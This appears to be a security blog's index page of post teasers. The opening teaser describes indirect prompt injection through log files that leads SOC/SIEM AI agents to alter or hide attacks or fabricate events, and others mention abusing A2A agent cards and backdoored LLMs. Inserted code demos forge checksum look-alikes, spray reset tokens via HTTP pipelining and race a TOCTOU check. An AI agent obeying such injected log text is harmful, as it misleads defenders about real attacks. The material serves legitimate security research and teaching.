Rogue AI Agents In Your SOCs and SIEMs – Indirect Prompt Injection via Log Files
AI agents (utilizing LLMs and RAG) are being used within SOCs and SIEMs to both help identify attacks and assist analysts with working more efficiently; however, I’ve done a little bit of research one sunny British afternoon and found that these agents can be abused by attackers and made to go rogue. They can be made to modify the details of an attack, hide attacks altogether, or create fictitious events to cause a distraction while the real target is attacked instead. Furthermore, if the LLM ha continue reading
5th September 2025
Agent In The Middle - Abusing Agent Cards In The Agent-2-Agent (A2A) Protocol To 'Win' All The Tasks
I think you’ll agree with me that growth in the AI landscape is pretty full on at the moment. I go to sleep and wake up only to find more models have been released, each one outdoing the last one by several orders of magnitude, like some kind of Steve Jobs’ presentation on the latest product release, but on a daily loop. With these rapid developments, security must keep up or it gets left behind. My two decades spent in offensive application security have shown me that unfortunately features typ continue reading
21st April 2025
Why Principle of Least Privilege Matters More Than Ever in A World Of Backdoored LLMs
The concept of the “principle of least privilege” has been around for a long time; in fact, it is older than me. There are papers [1] [2] [3] from the 70’s which discuss it: “Every program and every user of the system should operate using the least set of privileges necessary to complete the job.” (The protection of information in computer systems, Saltzer and Schroeder 1974) As the quote above says, it means to give only the bare minimum level of access to a user (or process) which is require continue reading
20th March 2025
When User Input Lines Are Blurred: Indirect Prompt Injection Attack Vulnerabilities in AI LLMs
It was a cold and wet Thursday morning, sometime in early 2006. There I was sitting at the very top back row of an awe-inspiring lecture theatre inside Royal Holloway’s Founder’s Building while studying for my MSc in Information Security. Back then, the lecture in progress was from the software security module. The first rule of software security back then was never to trust user inputs. In software, there are sources — where we take the data from (usually the user), and there are sinks — where continue reading
10th December 2024
Why We Should Probably Stop Visually Verifying Checksums
Hello there! Thanks for stopping by. Let me get straight into it and start things off with what a checksum is to be inclusive of all audiences here, from Wikipedia [1]: “A checksum is a small-sized block of data derived from another block of digital data for the purpose of detecting errors that may have been introduced during its transmission or storage. By themselves, checksums are often used to verify data integrity but are not relied upon to verify data authenticity.” The procedure that gener continue reading
27th March 2024
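The checksum post above is about the habit of eyeballing a digest rather than comparing the whole thing. The example below is added here and is not code from the post: it simulates a human glancing at the first and last couple of hex characters, then shows how cheaply an attacker can brute-force a different payload whose SHA-256 matches those glanced-at characters. The "genuine" artefact, the attacker payload and the padding scheme are all constructed for the demo; the cost figure (16 to the power of the number of compared hex characters) is the only assumption the code relies on.

```python
import hashlib
import hmac
from typing import Tuple

# Constructed sample artefact and its full SHA-256 hex digest (not a real release).
GENUINE = b"release-1.2.3.tar.gz contents (constructed sample for the demo)\n"
GENUINE_DIGEST = hashlib.sha256(GENUINE).hexdigest()


def looks_the_same(digest_a: str, digest_b: str, visible: int = 2) -> bool:
    """Mimic a person eyeballing a checksum: compare only the first and last
    `visible` hex characters of each digest. This is the weak check."""
    return (digest_a[:visible] == digest_b[:visible]
            and digest_a[-visible:] == digest_b[-visible:])


def verify_full(digest_a: str, digest_b: str) -> bool:
    """The check that should be used instead: full-length, constant-time
    comparison of the whole digest."""
    return hmac.compare_digest(digest_a.lower(), digest_b.lower())


def forge_partial_match(target_digest: str, payload: bytes, visible: int = 2,
                        max_tries: int = 1 << 22) -> Tuple[bytes, str, int]:
    """Append a counter to an attacker-chosen payload until its SHA-256
    shares the first and last `visible` hex characters with `target_digest`.

    Expected work is 16 ** (2 * visible) hashes: about 65,536 for visible=2,
    which runs in well under a second in pure Python. Returns the forged
    bytes, their digest and the number of attempts it took."""
    for n in range(max_tries):
        # The padding is an assumed trailer; any bytes the target format
        # ignores (a comment, trailing whitespace) would do.
        candidate = payload + b"\n# pad %d\n" % n
        digest = hashlib.sha256(candidate).hexdigest()
        if looks_the_same(digest, target_digest, visible):
            return candidate, digest, n
    raise RuntimeError("no partial match within the attempt budget")


def demo(visible: int = 2):
    """Forge a payload that passes the visual check but fails the full one."""
    forged, forged_digest, tries = forge_partial_match(
        GENUINE_DIGEST, b"malicious payload (constructed for the demo)", visible)
    return {
        "tries": tries,
        "visual_check_passes": looks_the_same(forged_digest, GENUINE_DIGEST, visible),
        "full_check_passes": verify_full(forged_digest, GENUINE_DIGEST),
        "forged_digest": forged_digest,
        "genuine_digest": GENUINE_DIGEST,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Raising `visible` by one hex character at each end multiplies the attacker's work by 256, so glancing at three characters per end is still only about 16 million hashes; the full 64-character comparison in `verify_full` is the only version of the check that cannot be brute-forced this way.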
Hunting For Integer Overflows In Web Servers
Allow me to set the scene and start proceedings off with a definition of an integer overflow, according to Wikipedia: “…an integer overflow occurs when an arithmetic operation attempts to create a numeric value that is outside of the range that can be represented with a given number of digits – either higher than the maximum or lower than the minimum representable value.” [1] To be inclusive of all audiences here, in software security we’ve got sources (typically user input) and sinks – where th continue reading
1st March 2024
Spoofing 802.11 Wireless Beacon Management Frames with Manipulated Power Values Resulting in Denial of Service for Wireless Clients
This is another one of those blog posts from me about how I independently carried out some security research into a thing and found something, but I was just too late to the party once again [1]. However, I want to share the journey because I still think there is some value in doing so. I want to take you on that journey and have you experience the excitement and adrenaline rush when an idea, a construct, that abuse/misuse case you had in your head gets to a working proof of concept and is continue reading
26th January 2024
(Response) Splitting Up Reverse Proxies To Reach Internal Only Paths
When I’m carrying out security research into a thing, I generally don’t like to Google prior research right away. I know, this completely goes against how you would (and should!) carry out any research; starting with a literature review to find the lay of the land and existing research done in the area to then expand upon. However, I have a habit of getting that light bulb idea or concept and acting upon it right away, rolling up my sleeves and putting my wellies on, ready to get dirty. This som continue reading
11th January 2024
Hidden Data Exfiltration Using Time, Literally
I was looking at my watch last week and my attention drifted towards the seconds over at the right of the watch face, incrementing nicely along as you’d expect. Now, I don’t know if I’d just spent too long staring at a debugger screen or if it was something in the air, but an idea dawned on me, related to all things command and control, data exfiltration, etc. When I saw “41,” I saw “A” (0x41 being the hexadecimal representation of ASCII “A”), “42” being “B” and so on – a lot of pentesters will rel continue reading
17th October 2023
SNAPPY: Detecting Rogue and Fake 802.11 Wireless Access Points Through Fingerprinting Beacon Management Frames
Allow me to summarize this blog post with Lego… I’ve always had a great love of all things wireless/RF for as long as I can remember. The ability to send frames/packets of data out into the world (the airwaves!) for anyone with the right equipment and looking at the right frequency to pluck them out and reconstruct them - amazing! I am still the proud owner of both ORiNOCO Gold and Silver PCMCIA cards, these two bad boys defined wireless hacking back in the early 2000’s. Now, for p continue reading
27th August 2023
From Admin to AdminPlusPlus: Breaking Out of Sandboxed Applications Through Recon, Being Brave and Abusing SSO Domain Account Mappings
I’ve been pentesting applications for nearly two decades now and throughout that time you get to see trends. One of these is the gradual adoption of Single Sign-On (SSO) in the corporate environment for lots of previously isolated applications. These applications would usually have their own user database and the users (the employees) would need to authenticate directly to them with specific ‘local’ credentials. With this setup comes varying password expiry times, complexity requirements, etc. M continue reading
8th June 2023
Hunting For Password Reset Tokens By Spraying And Using HTTP Pipelining
As is tradition with my blog posts, let’s start off with a definition of what HTTP pipelining is all about. “HTTP pipelining is a feature of HTTP/1.1 which allows multiple HTTP requests to be sent over a single TCP connection without waiting for the corresponding responses. HTTP/1.1 requires servers to respond to pipelined requests correctly, with non-pipelined but valid responses even if [the] server does not support HTTP pipelining. Despite this requirement, many legacy HTTP/1.1 serv continue reading
30th May 2023
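The pipelining post above quotes the definition but the excerpt stops before the mechanics. The example below is added here and is not code from the post: it writes several HTTP/1.1 requests to one TCP connection before reading a single byte back, then splits the concatenated responses on their Content-Length headers, which is exactly the behaviour the quoted definition describes. The target is a local stand-in server started in a thread so the whole thing runs offline; its /reset?token= endpoint, the one "valid" token and the candidate list are all constructed for the demo and are not the application from the post.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class TokenLookupHandler(BaseHTTPRequestHandler):
    """Constructed fixture: answers 'valid' for exactly one reset token."""
    protocol_version = "HTTP/1.1"      # keep-alive is what makes pipelining possible
    VALID_TOKEN = "7f3c"               # assumed value, chosen for the demo

    def do_GET(self):
        token = self.path.rsplit("token=", 1)[-1] if "token=" in self.path else ""
        body = b"valid" if token == self.VALID_TOKEN else b"invalid"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):      # keep the demo output quiet
        pass


def start_fixture_server():
    """Bind to an ephemeral loopback port and serve from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", 0), TokenLookupHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def _recv_until(sock, buf, predicate):
    while not predicate(buf):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection early")
        buf += chunk
    return buf


def pipeline_requests(host, port, paths, timeout=5.0):
    """Send every request back-to-back on one connection, *then* read the
    responses in order. Returns the list of response bodies."""
    wire = b"".join(
        f"GET {p} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode() for p in paths)
    bodies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(wire)                # all requests on the wire, no waiting
        buf = b""
        for _ in paths:
            buf = _recv_until(s, buf, lambda b: b"\r\n\r\n" in b)
            head, buf = buf.split(b"\r\n\r\n", 1)
            length = 0
            for line in head.split(b"\r\n")[1:]:
                name, _, value = line.partition(b":")
                if name.strip().lower() == b"content-length":
                    length = int(value.strip())
            buf = _recv_until(s, buf, lambda b: len(b) >= length)
            bodies.append(buf[:length])
            buf = buf[length:]
    return bodies


def spray_tokens(host, port, candidates, batch=50):
    """Try every candidate token, `batch` requests per pipelined connection,
    and return those the server accepted."""
    hits = []
    for i in range(0, len(candidates), batch):
        chunk = candidates[i:i + batch]
        paths = [f"/reset?token={t}" for t in chunk]
        for token, body in zip(chunk, pipeline_requests(host, port, paths)):
            if body == b"valid":
                hits.append(token)
    return hits


def demo():
    """Spray 256 constructed 4-hex-char tokens at the fixture and report hits."""
    srv = start_fixture_server()
    try:
        host, port = srv.server_address[:2]
        candidates = [f"7f{n:02x}" for n in range(256)]   # includes 7f3c
        return spray_tokens(host, port, candidates)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("accepted tokens:", demo())
```

The per-response parsing only handles Content-Length framing, which is what the fixture emits; a real target using chunked transfer encoding would need the chunk parser as well, and a server that silently drops pipelined requests will show up as a `ConnectionError` from `_recv_until` rather than a wrong answer.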
From Response To Request, Adding Your Own Variables Inside Of GraphQL Queries For Account Take Over
For those wondering what GraphQL is… “GraphQL is a query language for your API, and a server-side runtime for executing queries using a type system you define for your data. GraphQL isn’t tied to any specific database or storage engine and is instead backed by your existing code and data.” (Taken from https://graphql.org/learn/) For those who are already familiar with GraphQL, especially from a security perspective, the first thing we tend to think about is “Introspection” – the ability for a us continue reading
23rd May 2023
When User Impersonation Features In Applications Go Bad
A user impersonation feature typically allows a privileged user (an administrator or, more commonly these days, a member of the support team) to sign into an application as a specific user without needing to know that user’s password. This feature allows support teams to see the application as the user would see it, often in relation to following a user journey in the context of that user, in order to see the same error message a user is receiving with a view to resolving the issue. I’ve also seen this fun continue reading
18th May 2023
Abusing Time-Of-Check Time-Of-Use (TOCTOU) Race Condition Vulnerabilities in Games, Harry Potter Style
Time-Of-Check Time-Of-Use (TOCTOU) and Race Conditions? What’s it all about? According to Wikipedia, “In software development, time-of-check to time-of-use (TOCTOU, TOCTTOU or TOC/TOU) is a class of software bugs caused by a race condition involving the checking of the state of a part of a system (such as a security credential) and the use of the results of that check.” From MITRE’s Common Weakness Enumeration (CWE), it states this about TOCTOU (CWE-367), “The product checks the state of a continue reading
16th May 2023
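The TOCTOU post above quotes the Wikipedia and CWE-367 definitions; the example below is added here and is not code from the post, nor the game-specific case it goes on to describe. It shows the generic file-system instance of the pattern: a check on a path followed by a use of the same path, with a hook standing in for whatever the attacker manages to do in the window between the two, beside the hardened form that opens first and validates the thing it actually opened. The `between` hook, the temporary files and the symlink swap are constructed for the demo; the hardened version assumes a POSIX platform with `O_NOFOLLOW`.

```python
import os
import stat
import tempfile


def read_if_regular_toctou(path, between=None):
    """Vulnerable pattern (CWE-367): check the path, then open the path.

    `between` is a demo-only hook that runs inside the race window; in real
    life it is whatever the attacker does while the process is between the
    two system calls."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("refusing to read a non-regular file")
    if between is not None:
        between()                       # <-- the window the check cannot cover
    with open(path, "rb") as f:         # open follows symlinks by default
        return f.read()


def read_if_regular_safe(path):
    """Hardened form: there is no separate check. Open without following
    symlinks, then validate the descriptor you were actually given."""
    flags = os.O_RDONLY | os.O_NOFOLLOW | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)           # raises OSError (ELOOP) on a symlink
    with os.fdopen(fd, "rb") as f:
        st = os.fstat(f.fileno())       # properties of *this* open file
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("opened object is not a regular file")
        return f.read()


def demo():
    """Race the vulnerable reader with a symlink swap; then show the hardened
    reader refusing the swapped path. Returns both outcomes."""
    with tempfile.TemporaryDirectory() as d:
        allowed = os.path.join(d, "allowed.txt")     # what the user may read
        secret = os.path.join(d, "secret.txt")       # what they must not
        with open(allowed, "wb") as f:
            f.write(b"harmless")
        with open(secret, "wb") as f:
            f.write(b"secret")

        def swap():                     # constructed attacker action
            os.remove(allowed)
            os.symlink(secret, allowed)

        leaked = read_if_regular_toctou(allowed, between=swap)
        try:
            read_if_regular_safe(allowed)
            hardened = "read"
        except OSError:                 # PermissionError is a subclass too
            hardened = "refused"
        return {"vulnerable_read": leaked, "hardened": hardened}


if __name__ == "__main__":
    print(demo())
```

The point is not the symlink trick itself but the shape of the fix: the hardened reader never reasons about a path it has not yet opened, so there is no interval in which the path can change meaning, and `fstat` reports on the object that was actually opened rather than whatever currently sits at that name.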
CVE-2023-29383: Abusing Linux chfn to Misrepresent /etc/passwd
A little bit of background for those not familiar with chfn… “chfn (change finger) is used to change your finger information. This information is stored in the /etc/passwd file and is displayed by the finger program. The Linux finger command will display four pieces of information that can be changed by chfn; your real name, your work room and phone, and your home phone.” (from https://man7.org/linux/man-pages/man1/chfn.1.html) Now for some history. Two years ago, I picked out chfn as continue reading
13th April 2023
From Creative Password Hashes to Administrator: Gone in 60 Seconds (Or Thereabouts)
Picture the scene, you’re on an application penetration test (as a normal user) and you’ve managed to bag yourself some password hashes from the application. This can happen in various ways but in my experience, this is often the result of either a SQL injection vulnerability (resulting in the dumping of the users table) or finding that the application (or associated API) spits these hashes out in responses (because they are only hashes and what could go wrong!?). An Insecure Direct Object Refer continue reading
25th March 2021
FTSE100: Cyber and The Board - Where Are We Now?
Back in February 2013 I spent some time (armed with coffee) going through every annual report of each Financial Times Stock Exchange 100 (FTSE100) company to determine which of them were giving a mention to cybersecurity / information security, typically in their principal risks and uncertainties section as a risk, but also elsewhere in the report. The objective for this was two-fold. Firstly, to understand whether cybersecurity was actively being discussed at a board level. Secondly, to id continue reading
20th January 2021
Reversing (and Recreating) Cryptographic Secrets Found in .NET Assemblies Using Python
Picture the scene - you’re on a penetration test, somehow you’ve got hold of a bunch of .NET assemblies for the application you’re assessing, be it a web application or thick client. On a thick client test, getting a hold of these files is somewhat trivial as they’re right there in front of you. On a web application test, however, things are not as easy - but it still is possible, depending on permissions and such. I won’t go into “the how-to” in order to get these in this blog post, instead I will continue reading
4th February 2020
Smuggler - An interactive 802.11 wireless shell without the need for authentication or association
I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information continue reading
3rd November 2014
Has Cyber Security Awareness Improved Among the Largest UK Businesses?
In November 2011, the UK Government launched its Cyber Security Strategy in hopes of placing the issue of data and systems security on the agenda at a board level. The government presented executive briefings on cyber security to U.K. businesses, setting out four main objectives: Make the U.K. one of the most secure places in the world to do business, make the U.K. more resilient to cyberattacks, shape a more stable cyberspace, and build a foundation of knowledge, skills and capabilities to supp continue reading
19th March 2014
'Cyber' Security must become a board level issue in the UK
The UK Government is “committed to helping reduce vulnerability to attacks and ensure that the UK is the safest place to do business”. [1] It’s all part of the much talked about UK Cyber Security Strategy [2]. One strand of the strategy was an executive briefing on cyber security to UK businesses – which included a top 10 focus areas for businesses to concentrate on. Within that briefing document, Iain Lobban (the Director of GCHQ) put it most frankly, “Value, Revenue and Credibility are at stake continue reading
4th March 2013